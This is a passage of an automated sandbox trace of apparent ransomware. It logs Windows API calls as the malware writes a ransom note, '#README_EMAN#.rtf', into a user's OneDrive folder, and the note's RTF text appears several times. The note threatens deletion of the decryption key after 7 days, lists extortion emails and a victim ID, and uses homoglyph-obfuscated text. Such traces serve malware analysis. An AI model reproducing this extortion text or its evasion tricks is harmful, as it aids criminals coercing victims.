m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7fÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0289.707] WriteFile (in: hFile=0x2cc, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0289.708] CloseHandle (hObject=0x2cc) returned 1 [0289.708] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\#readme_eman#.rtf")) returned 0xffffffff [0289.708] GetLastError () returned 0x2 [0289.708] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0289.713] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.713] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.713] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up 